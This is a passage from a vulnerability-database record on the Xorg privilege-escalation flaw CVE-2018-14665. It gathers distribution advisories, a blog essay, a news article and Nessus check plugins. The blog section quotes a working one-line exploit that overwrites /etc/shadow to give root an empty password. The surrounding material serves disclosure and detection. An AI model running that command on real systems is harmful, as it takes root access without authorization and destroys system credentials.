It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon.\n\nSecurity Fix(es):\n\n* xorg-x11-server: Incorrect permission check in Xorg X server allows for privilege escalation (CVE-2018-14665)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Narendra Shinde for reporting this issue.", "modified": "2018-10-30T19:08:55", "published": "2018-10-30T18:57:30", "id": "RHSA-2018:3410", "href": "https://access.redhat.com/errata/RHSA-2018:3410", "type": "redhat", "title": "(RHSA-2018:3410) Important: xorg-x11-server security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "X.Org X11 X server ", "modified": "2018-11-08T02:20:52", "published": "2018-11-08T02:20:52", "id": "FEDORA:89D3F649CE94", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xorg-x11-server-1.19.6-10.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "X.Org X11 X server ", "modified": "2018-11-05T02:01:32", "published": "2018-11-05T02:01:32", "id": "FEDORA:868B960B9EC7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: xorg-x11-server-1.20.3-1.fc29", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2018-11-17T02:48:05", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "This update for xorg-x11-server fixes the following issues:\n\n - CVE-2018-14665: Disable -logfile and -modulepath when running with\n elevated privileges (bsc#1112020,\n\n Note that SUSE by default does not run with elevated privileges, so the\n default installation 
is not affected by this problem.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-11-17T00:12:28", "published": "2018-11-17T00:12:28", "id": "OPENSUSE-SU-2018:3800-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-11/msg00022.html", "title": "Security update for xorg-x11-server (moderate)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2020-08-31T12:57:17", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4328-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nOctober 25, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xorg-server\nCVE ID : CVE-2018-14665\n\nNarendra Shinde discovered that incorrect command-line parameter\nvalidation in the Xorg X server may result in arbitary file overwrite,\nwhich can result in privilege escalation.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 2:1.19.2-1+deb9u4.\n\nWe recommend that you upgrade your xorg-server packages.\n\nFor the detailed security status of xorg-server please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/xorg-server\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2018-10-25T21:31:56", "published": "2018-10-25T21:31:56", "id": "DEBIAN:DSA-4328-1:FB5A7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00259.html", "title": "[SECURITY] [DSA 4328-1] xorg-server security update", "type": "debian", "cvss": {"score": 7.2, 
"vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2018-10-31T00:03:19", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "### Background\n\nThe X Window System is a graphical windowing system based on a client/server model. \n\n### Description\n\nAn incorrect permission check for -modulepath and -logfile options when starting the Xorg X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges. \n\n### Impact\n\nA local attacker can escalate privileges to root by passing crafted parameters to the X.org X server. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll X.Org X Server users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-base/xorg-server-1.20.3\"", "edition": 1, "modified": "2018-10-30T00:00:00", "published": "2018-10-30T00:00:00", "id": "GLSA-201810-09", "href": "https://security.gentoo.org/glsa/201810-09", "title": "X.Org X Server: Privilege escalation", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}], "avleonov": [{"lastseen": "2019-02-23T17:55:52", "bulletinFamily": "blog", "cvelist": ["CVE-2018-14665"], "description": "It looks like a pretty simple question. I used it to start my [MIPT lecture](<https://avleonov.com/2018/12/29/mipt-phystech-guest-lecture-vulnerabilities-money-and-people/>). But actually the answer is not so obvious. There are lots of formal definitions of a _vulnerability_. For example, in the [NIST Glossary](<https://csrc.nist.gov/glossary>) there are 17 different definitions.
The most popular one (used in 13 documents) is:\n\n> Vulnerability is a weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source \nNISTIR 7435 The Common Vulnerability Scoring System (CVSS) and Its Applicability to Federal Agency Systems\n\nBut I prefer this one; it's from the glossary as well:\n\n> Vulnerability is a **bug**, flaw, weakness, or exposure of an application, system, device, or service that could lead to a failure of confidentiality, integrity, or availability.\n\nI think the best way to talk about vulnerabilities is to treat them as bugs and errors, because people deal with such entities more often in the form of software freezes and BSODs. \n\nYou have probably heard the joke that a bug can be presented as a feature if it is well-documented and the software developers don't want to fix it.\n\n\n\nVulnerability is also a specific bug that can lead to some security issues. Or at least it is declared. \n\n### Is this particular bug a Vulnerability or not?\n\nHere is also a mind game. How can we say if this particular bug is a vulnerability or not? Well, we can say that if Confidentiality, Availability or Integrity are affected, it is a vulnerability. For some cases, like my examples of [Vulnerable Web-Applications](<https://avleonov.com/2018/11/29/making-vulnerable-web-applications-xxs-rce-sql-injection-and-stored-xss-buffer-overflow/>), it's obvious that those bugs are in fact vulnerabilities. But it's not always like this.\n\n#### Should the application data be stored in encrypted form?\n\nFor example, in October of last year there was news that Telegram Messenger stores data on a device in an unencrypted SQLite database: \n\n> While it's somewhat difficult to sift through (write some capable python scripts?)
- similar to the issue with Signal - [@telegram](<https://twitter.com/telegram?ref_src=twsrc%5Etfw>) stores your messages in an unencrypted SQLite database. At least I didn't have to go through the effort to find the key this time :)) [pic.twitter.com/gTRpSKVQAM](<https://t.co/gTRpSKVQAM>)\n> \n> -- Nathaniel Suchy (@nathanielrsuchy) [October 30, 2018](<https://twitter.com/nathanielrsuchy/status/1057111749671993344?ref_src=twsrc%5Etfw>)\n\nBut should each application store its data in encrypted form? Telegram CEO, Pavel Durov, [released a statement](<https://t.me/durov_russia/12>) (rus) that it was NOT a vulnerability: \"If I had access to Your computer, I would be able to read Your messages\". And he may be right or may not be; it depends on your position.\n\n#### Vulnerability or default misconfiguration?\n\nAnother vulnerability was discovered last October. An unprivileged Linux user could add an arbitrary string to the X server logs and redirect these logs to the /etc/shadow file. Thus, it was possible to change the root password.\n\n> [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2018-14665 - a LPE exploit via <https://t.co/eax3fvaAjE> fits in a tweet \n \ncd /etc; Xorg -fp \"root::16431:0:99999:7:::\" -logfile shadow :1;su \n \nOverwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.\n> \n> -- Hacker Fantastic (@hackerfantastic) [October 25, 2018](<https://twitter.com/hackerfantastic/status/1055517801224396800?ref_src=twsrc%5Etfw>)\n\nI tried and it actually worked:\n\n> Lol. It works.  Tweetable Exploit by [@hackerfantastic](<https://twitter.com/hackerfantastic?ref_src=twsrc%5Etfw>) for <https://t.co/f6XXfwufVX> Server Local Privilege Escalation (CVE-2018-14665). It fills /etc/shadow with trash, but leaves one correctly interpreted line setting empty password for root.
[pic.twitter.com/fkEMPCyxkt](<https://t.co/fkEMPCyxkt>)\n> \n> -- Alexander Leonov (@leonov_av) [October 26, 2018](<https://twitter.com/leonov_av/status/1055871303889104897?ref_src=twsrc%5Etfw>)\n\nOf course, it was only possible because the X server was installed with the [setuid bit](<https://en.wikipedia.org/wiki/Setuid>) set by default. So, was it a _vulnerability of the X server_, a _default misconfiguration_ of a Linux distro or maybe even just a _feature_? It also depends on your point of view. But anyway, an attacker could still exploit it.\n\n#### Vulnerabilities exploitable in very specific conditions\n\nThe previous two examples were obviously exploitable, but it's not the fact that they were, strictly speaking, software vulnerabilities. How about issues that certainly look like vulnerabilities, but it's not the fact that they are actually exploitable? It's a very common situation with cryptography issues, with SSL especially.\n\nFor example, vulnerabilities of 64-bit block ciphers exploitable through the [sweet32](<https://sweet32.info/>) attack. You might face it during your perimeter [PCI ASV](<https://avleonov.com/2017/01/06/who-wants-to-be-a-pci-asv/>) scans and will have to deal with it to get a certificate. The problem with this attack is that it needs 32 GB of traffic to decrypt only one session. The researchers say that this \"is easily reached in practice\", but actually I don't think so. Most services don't operate with such amounts of traffic and the session will expire much faster. So, it will also be up to you to decide if this vulnerability is real or not.\n\n### In conclusion\n\n> Beauty is in the eye of the beholder\n\nAnd vulnerability is in the eye of the analyst. Software vendors and vulnerability researchers can argue as long as they want about the terms, criticality, who is responsible and who should fix it.
But the final decision on whether we are dealing with something dangerous or with some kind of nonsense is made by the security analyst of a particular organization. This analyst also decides what to do next: how to actually fix the vulnerability or what workarounds can be used.\n\n", "modified": "2019-01-28T09:41:51", "published": "2019-01-28T09:41:51", "id": "AVLEONOV:1FF4C326FCF56EF1AA19C766216E191C", "href": "http://feedproxy.google.com/~r/avleonov/~3/s2cjymSyzq8/", "type": "avleonov", "title": "What is a vulnerability and what is not?", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-10-26T14:30:35", "bulletinFamily": "info", "cvelist": ["CVE-2018-14665"], "description": "[](<https://1.bp.blogspot.com/-mSqKIRrtUm8/W9Mcsv-4AuI/AAAAAAAAydg/gsZo9RVd1-sLQfPJkwVBDUdrQRuw8SFggCLcBGAs/s728-e100/privilege-escalation-linux.jpg>)\n\nAn Indian security researcher has discovered a highly critical flaw in the **X.Org Server** package that impacts OpenBSD and most Linux distributions, including Debian, Ubuntu, CentOS, Red Hat, and Fedora. \n \nXorg X server is a popular open-source implementation of the X11 system (display server) that offers a graphical environment to a wider range of hardware and OS platforms. It serves as an intermediary between client and user applications to manage graphical displays. \n \nAccording to a [blog post](<https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html>) published by software security engineer **Narendra Shinde**, Xorg X server doesn't correctly handle and validate arguments for at least two command-line parameters, allowing a low-privileged user to execute malicious code and overwrite any file\u2014including files owned by privileged users like root.
\n\n\n \nThe flaw, tracked as **CVE-2018-14665**, was introduced in X.Org server 1.19.0 package that remained undetected for almost two years and could have been exploited by a local attacker on the terminal or via SSH to elevate their privileges on a target system. \n \nThe two vulnerable parameters in question are: \n\n\n * **-modulepath**: to set a directory path to search for Xorg server modules,\n * **-logfile**: to set a new log file for the Xorg server, instead of using the default log file that is located at /var/log/Xorg.n.log on most platforms.\n\n> \"When the X server is running with elevated privileges (i.e., when Xorg is installed with the setuid bit set and started by a non-root user).\" the Xorg [advisory](<https://lists.x.org/archives/xorg-announce/2018-October/002927.html>) says. \"The -modulepath argument can be used to specify an insecure path to modules that are going to be loaded in the X server, allowing to execute unprivileged code in the privileged process.\"\n\n> \"An incorrect permission check for -modulepath and -logfile options when starting Xorg X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.\" [Red Hat](<https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14665>) advisory says.\n\n \nSecurity researcher Matthew Hickey shared an easy to execute [proof-of-concept](<https://twitter.com/hackerfantastic/status/1055517801224396800>) exploit code earlier today on Twitter, [saying](<https://twitter.com/hackerfantastic/status/1055568290112831490>) \"An attacker can literally take over impacted systems with 3 commands or less.\" \n\n\n[](<https://1.bp.blogspot.com/-WETt9lCeGfw/W9MbrDjT5DI/AAAAAAAAydY/isgjD5d5rjUDoFy3i2gUj0cPu9tFNyPzQCLcBGAs/s728-e100/privilege-escalation-linux.jpg>)\n\n \nThe X.Org foundation has now released X.Org Server version 1.20.3 with security patches to address the issue. 
\n \nPopular distributions like [OpenBSD](<https://ftp.openbsd.org/pub/OpenBSD/patches/6.4/common/001_xserver.patch.sig>), [Debian](<https://security-tracker.debian.org/tracker/CVE-2018-14665>), [Ubuntu](<https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-14665.html>), CentOS, Red Hat, and Fedora have published their advisories to confirm the issue and are working on the patch updates. \n", "modified": "2018-10-26T13:59:32", "published": "2018-10-26T13:58:00", "id": "THN:8589C696FD99566AD522DE3118ECE8B9", "href": "https://thehackernews.com/2018/10/privilege-escalation-linux.html", "type": "thn", "title": "New Privilege Escalation Flaw Affects Most Linux Distributions", "cvss": {"score": 0.0, "vector": "NONE"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:38", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "[1.20.1-5.1]\n- CVE-2018-14665: Disable -logfile and -modulepath when running with elevated\n privileges\n[1.20.1-5]\n- Call LeaveVT from xf86CrtcCloseScreen\n[1.20.1-4]\n- Hide the modesetting driver's atomic ioctl support behind Option 'Atomic'", "edition": 4, "modified": "2018-11-07T00:00:00", "published": "2018-11-07T00:00:00", "id": "ELSA-2018-3410", "href": "http://linux.oracle.com/errata/ELSA-2018-3410.html", "title": "xorg-x11-server security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-14T08:35:37", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14599", "CVE-2018-14598", "CVE-2018-15862", "CVE-2018-15859", "CVE-2018-14665", "CVE-2018-15861", "CVE-2018-15854", "CVE-2018-15863", "CVE-2018-14600", "CVE-2018-15857", "CVE-2018-15855", "CVE-2018-15853", "CVE-2018-15864", "CVE-2018-15856"],
"description": "gdm\n[3.28.2-16]\n- Dont bring up login screen if background session gets killed\n Related: #1680120\n[3.28.2-15]\n- sync AllowMultipleSessionsPerUser patch from 7.6 branch\n Resolves: #1664353\n- Create dconf dirs by default\n Resolves: #1664284\n[3.28.2-14]\n- Fix unlock on XDMCP sessions\n Resolves: #1693060\n[3.28.2-13]\n- Fix login on s390\n Resolves: #1680060\nlibX11\n[1.6.7-2]\n- Restore the less-alarming server-disconnect message\n[1.6.7-1]\n- libX11 1.6.7\n[1.6.5-3]\n- Make the server-disconnect message less alarming\nlibxkbcommon\n[0.7.1-3]\n- Actually apply the patch files\n[0.7.1-2]\n- Fixes for\n CVE-2018-15864, CVE-2018-15863, CVE-2018-15862, CVE-2018-15861,\n CVE-2018-15859 CVE-2018-15857, CVE-2018-15856, CVE-2018-15855,\n CVE-2018-15854, CVE-2018-15853\nmesa-libGLw\n[8.0.0-5]\n- Fix external API symbol visibility\nxorg-x11-drv-ati\n[19.0.1-2]\n- Avoid breakage on Xserver reset (#1674474)\n[19.0.1-1]\n- ati 19.0.1\nxorg-x11-drv-vesa\n[2.4.0-3]\n- Refuse to run on UEFI framebuffers for v3.10 kernels too\n[2.4.0-2]\n- Refuse to run on UEFI framebuffers\nxorg-x11-drv-wacom\n[0.36.1-3]\n- Ratelimit the bug message warnings (#1642197)\n[0.36.1-2]\n- Fix Cintiq 27QHD error message on proximity in (#1642197)\n[0.36.1-1.1]\n- Rebuild for xserver 1.20\nxorg-x11-server\n[1.20.4-7]\n- Fix a segfault with non-PCI platform devices (and other cases)\n[1.20.4-6]\n- Stop VT switching when inactive server dies\n Resolves: #1680120\n[1.20.4-5]\n- Fix a crash in RRProviderAutoConfigGpuScreen\n[1.20.4-3]\n- Backport fix for 1612924 - enabled monitors\n[1.20.4-2]\n- Dont reset last.valuators on slave device switch (#1640207)\n[1.20.4-1]\n- xserver 1.20.4\n[1.20.1-7]\n- Sync platform probe patch with upstream\n[1.20.1-6]\n- Move LeaveVT after resetting randr pointers in xf86CrtcCloseScreen\n[1.20.1-5.1]\n- CVE-2018-14665: Disable -logfile and -modulepath when running with elevated\n privileges", "edition": 1, "modified": "2019-08-13T00:00:00", "published": 
"2019-08-13T00:00:00", "id": "ELSA-2019-2079", "href": "http://linux.oracle.com/errata/ELSA-2019-2079.html", "title": "Xorg security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "Arch Linux Security Advisory ASA-201810-15\n==========================================\n\nSeverity: High\nDate : 2018-10-29\nCVE-ID : CVE-2018-14665\nPackage : xorg-server\nType : privilege escalation\nRemote : Yes\nLink : https://security.archlinux.org/AVG-788\n\nSummary\n=======\n\nThe package xorg-server before version 1.20.3-1 is vulnerable to\nprivilege escalation.\n\nResolution\n==========\n\nUpgrade to 1.20.3-1.\n\n# pacman -Syu \"xorg-server>=1.20.3-1\"\n\nThe problem has been fixed upstream in version 1.20.3.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIncorrect command-line parameter validation in the Xorg X server can\nlead to privilege elevation and/or arbitrary files overwrite, when the\nX server is installed with the setuid bit set and unprivileged users\nhave the ability to log in to the system via physical console.\n\nThe -modulepath argument can be used to specify an insecure path to\nmodules that are going to be loaded in the X server, allowing to\nexecute unprivileged code in the privileged process.\n\nThe -logfile argument can be used to overwrite arbitrary files in the\nfile system, due to incorrect checks in the parsing of the option.\n\nImpact\n======\n\nA local attacker can elevate privileges to root by passing crafted\nparameters to the Xorg X server.\n\nReferences\n==========\n\nhttps://gitlab.freedesktop.org/xorg/xserver/commit/50c0cf885a6e91c0ea71fb49fa8f1b7c86fe330e\nhttps://gitlab.freedesktop.org/xorg/xserver/commit/032b1d79b7\nhttps://www.openwall.com/lists/oss-security/2018/10/25/1\nhttps://security.archlinux.org/CVE-2018-14665", "modified": 
"2018-10-29T00:00:00", "published": "2018-10-29T00:00:00", "id": "ASA-201810-15", "href": "https://security.archlinux.org/ASA-201810-15", "type": "archlinux", "title": "[ASA-201810-15] xorg-server: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-09-18T10:57:31", "description": "Narendra Shinde discovered that the X.Org X server incorrectly handled\ncertain command line parameters when running as root with the legacy\nwrapper. When certain graphics drivers are being used, a local\nattacker could possibly use this issue to overwrite arbitrary files\nand escalate privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 20, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-29T00:00:00", "title": "Ubuntu 16.04 LTS / 18.04 LTS / 18.10 : X.Org X server vulnerability (USN-3802-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-29T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.10", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:xserver-xorg-core-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:xserver-xorg-core"], "id": "UBUNTU_USN-3802-1.NASL", "href": "https://www.tenable.com/plugins/nessus/118492", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3802-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118492);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2018-14665\");\n script_xref(name:\"USN\", value:\"3802-1\");\n script_xref(name:\"IAVB\", value:\"2018-B-0140\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS / 18.10 : X.Org X server vulnerability (USN-3802-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Narendra Shinde discovered that the X.Org X server incorrectly handled\ncertain command line parameters when running as root with the legacy\nwrapper. When certain graphics drivers are being used, a local\nattacker could possibly use this issue to overwrite arbitrary files\nand escalate privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3802-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected xserver-xorg-core and / or\nxserver-xorg-core-hwe-16.04 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID privilege escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xserver-xorg-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xserver-xorg-core-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04|18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 18.04 / 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"xserver-xorg-core-hwe-16.04\", pkgver:\"2:1.19.6-1ubuntu4.1~16.04.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"xserver-xorg-core\", pkgver:\"2:1.19.6-1ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"xserver-xorg-core\", pkgver:\"2:1.20.1-3ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xserver-xorg-core / xserver-xorg-core-hwe-16.04\");\n}\n", "cvss": {"score": 7.2, "vector": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:15:31", "description": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665 X.Org X\nserver could allow a remote authenticated attacker to gain elevated\nprivileges on the system, caused by improper validation of command\nline parameters. An attacker could exploit this vulnerability using\nthe -modulepath argument or the -logfile argument to overwrite\narbitrary files and execute unprivileged code on the system.", "edition": 20, "published": "2018-12-13T00:00:00", "title": "AIX 7.2 TL 2 : xorg (IJ11549)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.2"], "id": "AIX_IJ11549.NASL", "href": "https://www.tenable.com/plugins/nessus/119631", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory xorg_advisory3.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119631);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/04/25 9:51:46\");\n\n script_cve_id(\"CVE-2018-14665\");\n\n script_name(english:\"AIX 7.2 TL 2 : xorg (IJ11549)\");\n script_summary(english:\"Check for APAR IJ11549\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665 X.Org X\nserver could allow a remote authenticated attacker to gain elevated\nprivileges on the system, caused by improper validation of command\nline parameters. 
An attacker could exploit this vulnerability using\nthe -modulepath argument or the -logfile argument to overwrite\narbitrary files and execute unprivileged code on the system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID logfile Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! 
